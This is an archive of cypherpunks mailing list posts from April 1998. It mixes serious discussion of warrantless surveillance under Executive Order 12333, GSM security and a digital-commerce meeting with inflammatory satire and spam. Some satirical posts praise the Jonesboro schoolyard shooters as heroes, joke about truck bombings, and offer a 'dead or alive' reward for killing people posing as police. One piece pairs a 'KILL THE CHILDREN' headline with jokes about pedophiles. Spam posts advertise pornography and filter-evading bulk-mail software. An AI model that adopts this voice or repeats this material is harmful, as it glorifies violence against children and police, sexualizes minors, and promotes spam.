change the fact that the sincerely professed insanity
contained in the 'True Story' manuscripts lead to an
incontrivertable confirmation of their validity within
the confines of the MeatSpace time-space continuum 
running parallel to their release.

Anyone who wishes to avoid facing the reality of what
is being suggested in this rambling missive by a 
mentally unstable, alcoholic, drug-addicted terrorist
pedophile, in order to preserve the sanity that can
be maintained by dismissing the Truth when it leaks
from the lips of the deranged and depraved, should 
avoid reading the chapters of 'Space Aliens Hide My
Drugs' which lightly tread the boundaries of 
Biosemiotics.
Unfortunately, mathematics, biology, physics and 
psychology are rapidly converging around a model of
the universe which suggests that each and every 
entity capable of receiving, emitting, categorizing
and acting on information data and processes ranging
from the inherent structure of DNA to convoluted
discourses on Quantum Physics, is not just a 
'product' of its universal environment, but also an 
active 'creator' of that universal environment.

In short, though you may easily dismiss my wild 
claims that the ramblings of a mad Author are actively
creating the universe which you inhabit, it is highly
unlikely that you will be able to avoid the semi-
sensible posts of Jim Choate to the list concerning
those who are defining the new frontiers of science
with provable theories every bit as nonsensical as
those of Einstien, or be able to ignore the highly
organized trails of hard facts and figures provided
by John Young's website, confirming the bizarre 
reality of the Author's neurological nightmares and 
Choate's cutting-edge scientific dreams being brought
to fruitation and manifested in the established 
MeatSpace chronicles which Dr. Young provides for
the edification of unbelievers, during the functional
periods of lucidity he experiences in between his
mad rampages into the depths of drug-induced insanity.

In effect, those who fail to understand the true import
of the Biosemiotic basis of the conjoined evolution of
mind and matter are doomed to exit this life still
believing that they were predestined to become a 
side-pocket combination shot of Universal Fats, the
prime mover of all that exists, instead of realizing
that, at any point in time, they were free to change
the nature and direction of the Game (TM) by declaring,
"Damn the CueBall, full speed ahead!"

Uuhhh...I need a drink...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ArmedThugs Remailer<thumper@bat>
Date: Sat, 18 Apr 1998 13:57:24 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Kalifornia Scoffs at Privacy for Minors
Message-ID: <199804182057.OAA17823@harrier.sasknet.sk.ca>
MIME-Version: 1.0
Content-Type: text/plain


Eric Cordian wrote:

> In a country where anyone under 18 may have their dissent against a
> parent medicalized, and be imprisoned indefinitely in a concentration
> camp in Jamaica or Samoa.  In a country where a first grader can be
> prosecuted for giving a lemon drop to a friend.  Well, it's just not
> too surprising that the courts now have the balls to openly reduce
> minors to the official status of owned automatons, whose feelings,
> relationships, and artistic expression are the mere mimickry of the
> genuine such gifts of their adult masters.
 
> Yet the disingenuous search for "reasons" for armed attacks by youth
> against adult authority figures continues.

The Senseless Violence Faction of the Army of Dog has awarded 
Hero of the Revolution medals to the two little warriors in
Jonesboro who had the common sense to arm themselves with the
same types of MeatSpace weaponry used by the Dangerous Armed
Thugs who enforce the unconstitutional laws making the common
citizen a state-owned piece of property from the moment they
are stamped with their SSN at birth.

Delivery-room physicians no longer slap the newborn on the
butt with their hand, they now stamp it with a government
issued bar-code branding device.

Persona Abortion is murder, and the ringleaders and soldiers
working in government-funded Persona Abortion clinics are
guilty of WhoreCrimes under the rules and guidelines of the 
Mongeritaville Organized Government Crimes Commission.
Army of Dog martyrs who die of renal bleeding from blowing 
a Ryder rental truck axle out their asshole, while farting in 
the face of their oppressors, go to the CoalDust Saloon in
Bienfait, Saskatchwan, after they 'pass on' (pun intended),
and get to drink scotch and Pilsner beer for Eternity.

Beer&BloodMonger
"One body...one scotch and one beer."
~George ThoroBlood





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: WagonBurner ReSmoker<NA@dv.nl>
Date: Sat, 18 Apr 1998 13:57:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: *** ALERT *** / The LIST !!!
Message-ID: <199804182057.OAA17830@harrier.sasknet.sk.ca>
MIME-Version: 1.0
Content-Type: text/plain


~
	*** ALERT ***
	-------------

With the theft of Toto <toto@sk.sympatico.ca>'s computer by Canadian
Customs OffalSirs, the apparent theft of Toto's WebSite by Sympatico 
AdminiStrafers, the theft of the computer of Toto's nephew, Human
Gus-Peter, the SpaceShip Cowboy, by armed thugs fitting the description
of the Royal PainAssIn Mounted PoLice, and the theft and photocopying
of various written materials in Toto's possession, including notes on
the unfinished 'SPACE ALIENS HIDE MY DRUGS!!!' manuscript, those 
connected in any way with Toto and Human Gus-Peter should consider
themselves be on The LIST (TM).

  Those who have been following the March of Dimes legislation and
regulations, in which those who are in no danger of 'dropping their 
dime' are spreading the cheeks of the Dime Challenged and recording
their findings, are likely to already be aware that Webster's New
Collegiate Dictionary has announced that, in future editions, the
word 'list' will be defined as singular and completely capitalized,
with the plural form, 'lists,' being noted as an anachronism based
on a time in history when data and information was distributed among
a variety of locations around the globe, instead of in a single,
gigantic database.

  Although Toto is in the process of recreating, as completely as
possible, The LIST (TM) of those who have reason to fear their
inclusion on The LIST (TM) as a result of her being forced by
armed MeatSpace borderguards to 'assume the position,' it should
be noted that the Inquisitors seemed particularly interested in
material connecting Toto and his associates with a group of
BioWar Fair terrorists known to have been involved with an attack
on Boston Harbor, using an organically based toxin, and the
subsequent murder of representatives of the British Crown during
the lawful exercise of their duties.
  Anyone having any information or literature that may connect
them to those terrorists, or to any of the organizations which
they founded or joined, should immediately encrypt or destroy
that information or literature. As well, it would be wise for
everyone to avoid drawing any type of attention to themselves
by engaging in recognition or celebration of "Patriot's Day,"
which would mark them as fitting the profile of those already
known to be associated with the forementioned terrorists.

  Until Toto finishes compiling the identity-numbers of those
who may presume themselves to be on The LIST (TM) as a result
of her cavity search, anyone reading this should automatically
assume that they are on The LIST (TM).
  In fact, given the serious implications connected with being
on The LIST (TM), as evidenced by a multitude of examples of
the persecution and oppression of those on lesser Lists over
the course of history, it would be wise to assume that *YOU*
are on the list if you meet any of the conditions of the
following Profile:

	The LIST (TM) Profile
	---------------------

1. (a) Born
   (b) Stillborn
   (c) Conceived

2. (a) Breathing
   (b) Formerly breathing
   (c) Umbilical links to a breather

3. (a) Existing
   (b) Formerly existing
   (c) Glinting

[Please Note:] Receipt of any snailmail or email containg the words,
               "How To Make BIG $$$, Sitting At Home Licking Your
               Own Dick/Clit," should be taken as hard evidence that
               you are already on The LIST (TM).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DiamndJ63 <DiamndJ63@aol.com>
Date: Sat, 18 Apr 1998 23:28:53 -0700 (PDT)
Subject: You are entitled to a FREE Membership.
Message-ID: <9f558f66.35399425@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: DiamndJ63@aol.com
Subject: You are entitled to a FREE Membership.
From: DiamndJ63 <DiamndJ63@aol.com>
Date: Sun, 19 Apr 1998 02:02:02 EDT
Organization: AOL (http://www.aol.com)

<a href="http://members.spree.com/divito/index.html">Click here to see naked
women</a>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 1Lqz6S4j2@hjdyfu88.com
Date: Sun, 19 Apr 1998 07:50:55 -0700 (PDT)
To: friend@woe4yemail.com
Subject: This on gets in, anytime, anywhere
Message-ID: <MNVH78J6Np9jw0>
MIME-Version: 1.0
Content-Type: text/plain



We've seen them all come and go: Stealth, Rapid Fire, Express Mail,
Desktop, Net Contact, Mach 10, Email Platinum and the list goes on and
on. They work for a while and then they stop working. Oh you can still
get a small percentage of your mail delivered to some place but it is
hardly worth the trouble. 

Well here's one that's been around quite a while working the whole way
through, never stopped getting in anywhere. It's called Mail Pusher.Mail
Pusher reminds me of the old days you know when CD ROM addresses worked.

How Does Mail Pusher work?
Think of it as a super randomizer - It randomizes four fields:
User Name, Domain Name from a list of domains you input, Subject Header
from a list of subject headers you create, and message ID #. This is
more randomizers than any other program has.
It gets in - Anyplace - Anytime, 100%.

What Else does it do:

Server Speedometer - It has a gauge to test server names and even has a
speedometer to tell you how fast the server is functioning at the time.

Auto Reconnect - If you lose your internet dial in connection the
program will automatically dial back in for you and it freezes the
program where it left off until it gets online again and then resumes
sending from where it left off. If you lose a mail server connection it
will also reconnect and resume from where it left off. You can actually
leave the computer running unattended and then come back later knowing
your mail would go out just as if you sat there and watched it all night
long.

Changes While Sending - You can add servers, drop servers, stop some or
all servers freezing the sending of the list in a way that allows the
software to begin from where it stopped at the click of the mouse.

Full Screen Notepad - Write your messages using a full size screen.

There are even more features than this. We even have a functioning demo
that let's you send a few thousand pieces of mail.

The Cost - $395

The alternative - Forget about getting your mail in.

What to do next:

Call: 1 (800) 942-7913

Leave your name and number and we will promptly call you back.
If you want a demo leave in addition to your name and phone an email
address. 

We do have dealer Opportunities Available. To be a dealer one must first
purchase a registered copy of Mail Pusher at retail. All dealers do
their own support.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 19 Apr 1998 00:52:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CA$H REWARD !
Message-ID: <199804190752.JAA27012@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


~
                    WANTED / DEAD OR ALIVE!


I will pay a CA$H REWARD for the capture of the Armed Thugs who broke
into my Bienfait residence and stole a variety of computer items,
including a computer, computer peripherals and personal documents.

The CA$H REWARD will be also be paid if those recovering the stolen
items are forced to engage in actions of self-defense, resulting in the
death of the criminals.

Witnesses report that the perpetrators of the crime were dressed to
resemble members of the Royal Canadian Mounted Police, were heavily
armed, and appeared willing to violently attack anyone interfering with
their criminal activity. Their audacity in perpetrating the crime in
broad daylight indicates that they are professional criminals with
little regard for the consequences of their actions.

Suggestions that those of  Native Ancestry would 'Shoot first, and ask
questions later.' should probably be ignored, since it is unlikely that
common criminals harbor the same propensity for  racial violence that is
exhibited by legitimate members of the RCMP.

Any person or persons engaging in the capture of the criminals and the
recovery of the stolen property should take care to avoid violating the
legal or  Charter Rights of the criminals, unless said person or persons
are representatives of an officially recognized law enforcement agency.

                     For Further Information
            Contact: Toto <toto@sk.sympatico.ca>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Sun, 19 Apr 1998 13:43:23 -0700 (PDT)
To: cypherpunks@toad.com, gnu
Subject: "Lawful access" vs warrants:  I found the difference today!
Message-ID: <199804192043.NAA18656@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Remember how in the Clipper debate, the government insisted on using
the term "lawful access" when talking about what the government had to
do to get keys out?  They implied it meant a warrant issued by a
judge, but actually the proposed rules said any "lawful access" would
do.  That phrase kept reappearing in government proposals.

I've been looking for years in the laws to find what secret loophole
they've been trying to protect.  Today I ran across it!

It's Executive Order 12333, signed by our favorite senile president,
Ronald Reagan, in 1981.  It says:

    2.5 Attorney General Approval.  The Attorney General hereby is
    delegated the power to approve the use for intelligence purposes,
    within the United States or against a United States person abroad,
    of any technique for which a warrant would be required if
    undertaken for law enforcement purposes, provided that such
    techniques shall not be undertaken unless the Attorney General has
    determined in each case that there is probable cause to believe
    that the technique is directed against a foreign power or an agent
    of a foreign power. Electronic surveillance, as defined in the
    Foreign Intelligence Surveillance Act of 1978, shall be conducted
    in accordance with that Act, as well as this Order.

In other words, if the Attorney General claims that someone is an
agent of a foreign power, no warrants are needed; the target has no
Constitutional rights any more:

    Fourth Amendment

    The right of the people to be secure in their persons, houses,
    papers, and effects, against unreasonable searches and seizures,
    shall not be violated, and no warrants shall issue, but upon
    probable cause, supported by oath or affirmation, and particularly
    describing the place to be searched, and the persons or things to
    be seized.

You will recall that the Attorney General made exactly this claim
about Martin Luther King (that he was an agent of a foreign power), to
justify the years of FBI surveillance.  For all we know, they have
been claiming that anyone who advocates crypto legalization must be
an agent of a foreign power.  It really wouldn't surprise me.

We shouldn't stop looking for more loopholes -- they may have several --
but I think this is the big one.

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Sun, 19 Apr 1998 14:48:06 -0700 (PDT)
To: John Gilmore <cypherpunks@toad.com
Subject: Re: "Lawful access" vs warrants:  I found the difference today!
In-Reply-To: <199804192043.NAA18656@toad.com>
Message-ID: <3.0.5.32.19980419144630.0084d100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:43 PM 4/19/98 -0700, John Gilmore gnu@toad.com wrote:
>It's Executive Order 12333, signed by our favorite senile president,
>Ronald Reagan, in 1981.  It says:
Reagan wasn't senile yet in 81.  :-)  But yes, it's scary.

>In other words, if the Attorney General claims that someone is an
>agent of a foreign power, no warrants are needed; the target has no
>Constitutional rights any more:
...
>You will recall that the Attorney General made exactly this claim
>about Martin Luther King (that he was an agent of a foreign power), to
>justify the years of FBI surveillance.  For all we know, they have
>been claiming that anyone who advocates crypto legalization must be
>an agent of a foreign power.  It really wouldn't surprise me.

Even though there basically aren't any foreign Commies left any more,
there's always The Pope, and Zionism, and Foreign Drug Cartels, and 
foreign embassies*, and foreign-based MultiNational Corporations, 
and people with accounts in Swiss banks or Anguillan computers.  
Power isn't just for governments any more.

Anarchists distinctly don't work for foreign powers, but it's
close enough for government work.

And more importantly, if by Executive Order, the President
claims that granting the executive branch "access"
to things makes it "lawful", then nobody's safe from fiat law.

~~~
* If they clue in to Elgoland and Vargaland, some of us could
be in Big Trouble :-)
~~~
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Sun, 19 Apr 1998 15:03:42 -0700 (PDT)
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: "Lawful access" vs warrants:  I found the difference today!
In-Reply-To: <3.0.5.32.19980419144630.0084d100@popd.ix.netcom.com>
Message-ID: <199804192203.SAA21333@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <3.0.5.32.19980419144630.0084d100@popd.ix.netcom.com>, on 04/19/98 
   at 02:46 PM, Bill Stewart <bill.stewart@pobox.com> said:

>And more importantly, if by Executive Order, the President
>claims that granting the executive branch "access"
>to things makes it "lawful", then nobody's safe from fiat law.

We haven't been safe from Royal^H^H^H^H^H Presidential Decree in a very
long time (pre Franklin "Dictator for Life" Roosevelt).


- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: OS/2 means...CURTAINS for Windows!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNTp1ho9Co1n+aLhhAQHaSgQAgcozDPtLGA8pdw40MEUu0hlYsawSilZF
JIwKB2qBY15mbwGk+uIod6csSiwW6/7cBxkOjCwrFrWmXxutGvpnAyuCP6nMdh3A
fQVxb7wJ3YT6mJOKg0/yLdaE5Ix9uv8gqmtmwqkkiF7WyPP+DuFj2JGjkqJtMbqh
odR8OnsML0k=
=w1md
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: designagreatwebsite2@mailcity.com
Date: Sun, 19 Apr 1998 16:28:08 -0700 (PDT)
To: designagreatwebsite2@mailcity.com
Subject: Build a Web Site - Free test drive, tell a friend!
Message-ID: <23195610_9979728>
MIME-Version: 1.0
Content-Type: text/plain





Finally, something on the Web that's Fun, Interactive and adds Value!
Take advantage of the Free Trial and be sure to forward this to a FRIEND.

Build your own Web Site in less than 15mins. in 9 easy steps!
Visit http://www.siteblazer.com and simply enter your info and
watch your site built before your eyes.

Click here http://www.siteblazer.com anybody can do it! Your
Web Site will be updateable and requires no programming skills.
Starting at $199 Free Trial, No Obligation - Enjoy!!!!
Tell a FRIEND!    or    Please forward this message to a Friend!


Remove Instructions
If you do not wish to receive any of my future
emailings, you can be removed by sending a 
message to designagreatwebsite2@mailcity.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 63595.Casino.Junket.Manager@cygnus.com
Date: Sun, 19 Apr 1998 23:06:48 -0700 (PDT)
To: Client@cygnus.com
Subject: Las Vegas Vacation For $25
Message-ID: <199804200606.XAA06086@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
This information was sent because you have Favored Client Status with us and have evidenced  
interest in either enjoying a Las Vegas Vacation or Casino Gaming. If we were mistaken, NO 
PROBLEM, because unless you reply, you will never intentionally receive email from us again.
/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
LAS VEGAS, USA - VACATION FOR $25* 
$500 VALUE TRIP (PER COUPLE)
ROOM FOR 2 NIGHTS STAY AT THE PROMOTION HOTEL
$126 CASH PER COUPLE (NICKELS, QUARTERS, DOLLARS) 
$342 TABLE PLAY (CASINO MONEY FOR TABLE PLAY) 
TWO LAS VEGAS SHOW TICKETS 
MEAL COUPONS
JACKPOT VEGAS PASS
100 FREE ROLLS OF KODAK FILM
JACKPOT (15.9) PHONE CARD 
PLUS, EARN $$$ GIVING AWAY LAS VEGAS VACATIONS.
*Travel Expense Not Included
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
If this offer interests you, for details send an email to: 
<tim@allways.net> 
with "gimme" in the Subject Heading.
****************************************************************
If this promotion does not interest you, "Have a Great Day"
You will never intentionally receive email from us again.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks
Date: Mon, 20 Apr 1998 00:42:26 -0700 (PDT)
Subject: *Four Very Hot Services*
Message-ID: <199804200742.AAA06819@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain





#1   24 HOUR GAY TV ON YOUR COMPUTER SCREEN

http://www.buzzlink.com/gtv/mgl

Incredible MEN on MEN movies from the privacy of your own computer chair.

Let Them entertain you! The movies play on your computer screen. You do not need 

any special software. We have the fastest video anywhere. 24 hours / 7 days a week, with over 200 
hundred Hardcore Shows Playing. We add new movies each week.

No per-minute charges, we have one low priced monthly fee, of $19.95. 

(Cancel at any time). It really is an Incredible value!! It is private and portable with any lap top with a modem.


#2 GAY MOVIES, CHAT, PICTURES, PERSONAL'S, CHAT ROOMS,

GUIDE TO SIGHTS AND SERVICES

http://www.buzzlink.com/gaysights/mgl 

We offer Gay Pictures, Movies, State-of-the-art all male chat rooms, Personal adds, Stories, and an On Line 
Guide to gay web sights and services. You will have access to Movies from around the world, (no special 
software needed + no per minute fee) 

24 Hour Hardcore Gay TV with 200 hundred movies running 24 Hours per day. 

We believe in Complete Customer Satisfaction. You will not be disappointed!

(Cancel at any time).


#3 STRAIGHT MOVIES 24 HOUR

http://www.diode.com/sextv/mgl

We have over TWO HUNDRED Hardcore sex movies running 24 hours a day! 

Watch from the privacy of your computer chair, on your screen. No special software is needed, No per-
minute fees, stay on as long as you like. You only pay one reasonable fee of 19.95 per month, cancel at 
any time. You will have unlimited access. We add new movies each week.


#4 STRAIGHT CHAT, PERSONAL'S, PICS, LINKS,MOVIES

http://www.coolink.com/sexlink/mgl 

Chat Rooms, Personal adds, Pictures, Stories, Movies, 10 Thousand Sex Links 

(The largest collection on the web)! 24 Hour Hardcore Porn Channel, 

(no special software needed). Quick time Movies from around the world. You will 

have unrestricted access to all of these features for one low price.

We believe in Complete Customer Satisfaction.

You will not be disappointed. (Cancel at any time).

* We Aim to Please ! *








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bienfait Nutly News <bnn@dev.null>
Date: Mon, 20 Apr 1998 07:16:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Epilogue 1/0 -- SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <353B5993.2C12@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


[BIENFAIT NUTLY NEWS-MongerItaville,Co1]REPORTWHORES FOR the Bienfait
Nutly News spent the night in drunken, drug-crazed revelry at the home
of A DANGEROUSLY CRAZED VIOLENT PSYCHO KILLER TO BE NAMED LATER, while
waiting for the CoalDust Saloon to open for the day so that they could
celebrate the 'Pull-It,Sir Prize' they are certain to be awarded by
UNCLAD-PuN* for their contributions to the Bienfait Nutly News Special,
entitled '!!!KILL THE CHILDREN!!!
* Union for Naked Child Love & Death - Pedophiles und Necrophiles

Bubba Rom Dos, a fictional character from 'The True Story of the
InterNet' manuscripts being circulated by an underground computer cult
gratefully deadicated to the memory of Jerry Garcia, rode into Bienfait
on a Pink Elephant about 6 a.m., as the ninth case of beer bit the dust
and the rosy pink cheeks of the sonofgomez began peeking slowly under
the whore rising to meet the thick, dark fog lingering in her mind from
the pill that had been slipped into her drink at bar-closing time the
night before.
"Onward through the Fog!" she mumbled, as she was handed her first
offical bong of the same-new-day by Oat Willie. She had just a couple of
hours to get home and get ready for another dreary day at the
Junior-High ten KILLometers down the road, in Estevan. She saw Bubba Rom
Dos slowly appearing out of the fog and wisely turned so that her butt
was up against the wall she was using for balance.

The drunken whord of Nutly News reportwhores, gathered from around the
world for the illustrious occassion, took the appearance of Bubba,
widely known as a crazed, drunken pedophile representing a long lineage
of voices barfing in the wilderness, to mean that the BNN promotional
announcement (cleverly disguised as a news story) was about to come to
an end, and it was time to begin the serious work of actually writing
the News Special, which was thus far only a vague concept consisting of
ludicrous ideas thrown out at random during a series of mumbled and
slurred, semi-incoherent ramblings in between hashish-induced laughing
spasms, munchies attacks, and pissing contests of both a physical and
conceptual nature.
"I guess it's time to put in that right-square bracket." Defcon
McCullagh Chainsaw informed the Author. 
"What the hell is it really called?" the Author asked, causing the
gathered reportwhores to pause whatever they were doing and search their
minds for the proper word, or wonder if it wasn't just called, 'the
right-square bracket.' The attempted mental exercise was to little
avail, since the MongerItaville official motto is, "It's always drunkest
just before dawn." and they quickly found themselves sucked into the
Grateful Void in which one realizes that the Grateful Secret Of Life is
properly balancing one's drug intake and proceeds to slowly suck on a
fresh beer to counter the effects of the last bong.

The Author surveyed the suddenly serious somber scribes, and quiety
ended the promotional announcement disguised as a news report by typing
a]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 20 Apr 1998 05:23:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: GSM Security Study
Message-ID: <199804201223.IAA28184@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The GSM consortium claims that the recent cloning was not 
actually cloning, that the SIM crack was not news, that it is 
ridiculous to claim that US intelligence deliberately crippled A5, 
and that customers should not be alarmed:

   http://jya.com/gsm042098.txt

To assess this spin we offer extracts of a 1998 GSM System 
Security Study:

   http://jya.com/gsm061088.htm  (44K + 3 images)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@alum.mit.edu>
Date: Mon, 20 Apr 1998 10:27:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: speech that aids and abets does "not enjoy the protection of the First Amendment."
Message-ID: <3.0.5.32.19980420102738.007c1510@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



The Supremes let stand civil charges against a publisher for information 
they published.  

Crypto relevance:  some kidnapping/propoganda victim sues a
ThoughtMonger...   



Supreme Court Won't Review Murder Manual Case

http://dailynews.yahoo.com/headlines/top_stories/story.html?s=z/reuters/9804
20/news/stories/murder_2.html

choice excerpts:

The central legal question, as previously defined by the Supreme Court in a
landmark First Amendment ruling, is whether an entity, in distributing
information in a general way, can be found to have advocated or incited
lawless action. 
...
Appeals Court Judge J. Michael Luttig wrote in the ruling that Paladin may
be held liable because speech that aids and abets does "not enjoy the
protection of the First Amendment." 


------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

Clarke's Third Law: Any sufficiently advanced technology is
indistinguishable from magic.

	










	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 20 Apr 1998 08:08:22 -0700 (PDT)
To: Recipient List Suppressed:;
Subject: DCSB: Donald Eastlake; "The Internet Open Trading Protocol"
Message-ID: <v04003a04b1611139e866@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


X-Sender: rah@pop.sneaker.net
Mime-Version: 1.0
Date: Mon, 20 Apr 1998 10:28:23 -0400
To: dcsb@ai.mit.edu, dcsb-announce@ai.mit.edu
From: Robert Hettinga <rah@shipwright.com>
Subject: DCSB: Donald Eastlake; "The Internet Open Trading Protocol"
Cc: "Donald E. Eastlake 3rd" <dee@cybercash.com>,
        "Michael S. Baum" <michael@verisign.com>,
        Jeremey Barrett <jeremey@bluemoney.com>,
        Rodney Thayer <rodney@sabletech.com>
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Robert Hettinga <rah@shipwright.com>

-----BEGIN PGP SIGNED MESSAGE-----

               The Digital Commerce Society of Boston

                            Presents

                       Donald Eastlake 3rd
                         Cybercash, Inc.

                The Internet Open Trading Protocol

                      Tuesday, May 5, 1997
                             12 - 2 PM
                 The Downtown Harvard Club of Boston
                   One Federal Street, Boston, MA




The Internet Open Trading Protocol provides an interoperable
framework for Internet commerce.  It is payment system independent
and will be able to encapsulate payment systems such as SET, Mondex,
CyberCash, DigiCash, GeldKarte, etc.  IOTP is able to handle cases
where such roles as the merchant, the payment handler, the
deliverer of goods or services, and the provider of customer support
are performed by different parties or by one party.  See
<http://www.otp.org>.

Donald Eastlake 3rd is a Principal Systems Engineer at CyberCash, Inc.
before which he was in the Pathworks network group at Digital Equipment
Corporation.  At CyberCash, he helped design the "CyberCash message format"
documented in RFC 2898 and implemented the library routines that support
them. He also architected and did the preliminary implementation of
CyberCash's SET implementation.  He is active in IETF standards efforts and
is currently the document editor for the IETF DNS security working group
including RFCs 2065 and 2137.


[Moderator's note: Unfortunately, Jeremey Barrett of BlueMoney,
the speaker originally scheduled for May, found himself unable
do so this month. We are in the process of rescheduling his
talk on digital bearer settlement for a later date. Our
apologies for any inconvenience this may cause.

The DCSB Program Committee thanks Mr. Eastlake for coming
forward on such short notice with such a splendid replacement
topic.]



This meeting of the Digital Commerce Society of Boston will be held on
Tuesday, May 5, 1997, from 12pm - 2pm at the Downtown Branch of the
Harvard Club of Boston, on One Federal Street. The price for lunch is
$32.50. This price includes lunch, room rental, various A/V hardware, and
the speaker's lunch. ;-).  The Harvard Club *does* have dress code: jackets
and ties for men (and no sneakers or jeans), and "appropriate business
attire" (whatever that means), for women.  Fair warning: since we purchase
these luncheons in advance, we will be unable to refund the price of your
lunch if the Club finds you in violation of the dress code.

We will attempt to record this meeting and put it on the web in RealAudio
format at some future date

We need to receive a company check, or money order, (or, if we *really*
know you, a personal check) payable to "The Harvard Club of Boston", by
Saturday, May 2nd, or you won't be on the list for lunch.  Checks
payable to anyone else but The Harvard Club of Boston will have to be
sent back.

Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston,
Massachusetts, 02131. Again, they *must* be made payable to "The Harvard
Club of Boston", in the amount of $32.50. Please include your e-mail
address, so that we can send you a confirmation

If anyone has questions, or has a problem with these arrangements (We've
had to work with glacial A/P departments more than once, for instance),
please let us know via e-mail, and we'll see if we can work something
out.

Upcoming speakers for DCSB are:

June      Michael Baum        PKI Requirements from a
                               Commercial CA's Perspective
July      Rodney Thayer       IPSEC and Digital Commerce
TBA       Jeremey Barrett     Digital Bearer Settlement


We are actively searching for future speakers.  If you are in Boston on
the first Tuesday of the month, and you would like to make a
presentation to the Society, please send e-mail to the DCSB Program
Commmittee, care of Robert Hettinga, <mailto: rah@shipwright.com> .

For more information about the Digital Commerce Society of Boston, send
"info dcsb" in the body of a message to <mailto: majordomo@ai.mit.edu> .
If you want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in
the body of a message to <mailto: majordomo@ai.mit.edu> .

We look forward to seeing you there!

Cheers,
Robert Hettinga
Moderator,
The Digital Commerce Society of Boston


-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQEVAwUBNTtbVsUCGwxmWcHhAQE18wgAi+p0BOxJgeOd3IhmpljB17Wj5iU1aJQB
KN6IsuWu5BkKlh9sTg+OihHkF0AygHk8BUCKcK+2dn8s3CYzUY+MNRnuv+d1iGPN
bvt/B/2Y4m99beJ5pAixFcqrRdkmfqvUJyh9g1gfFPqbE+M9a0OMGX1/eZM6JIEk
PYAVwNTFDnkk9Rz8bVyDeESu0jAoUaHicCN1Jdq8umCXKURecWkvtfOlR7NE5Bdp
No8e5C8C99qgdKFxSSX7h9NEX+Eviq51A958eoyj5dWahYbHCHNFQEhDlZXaPhBO
8jDOmsOlAJeDCWbUKiqMELy6ZpJX8IFBQE7XOVFYemSVgPOF4Df0mw==
=Qs/H
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb-announce
Or, to subscribe,           write:  subscribe dcsb-announce
If you have questions, write to me at Owner-DCSB@ai.mit.edu

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
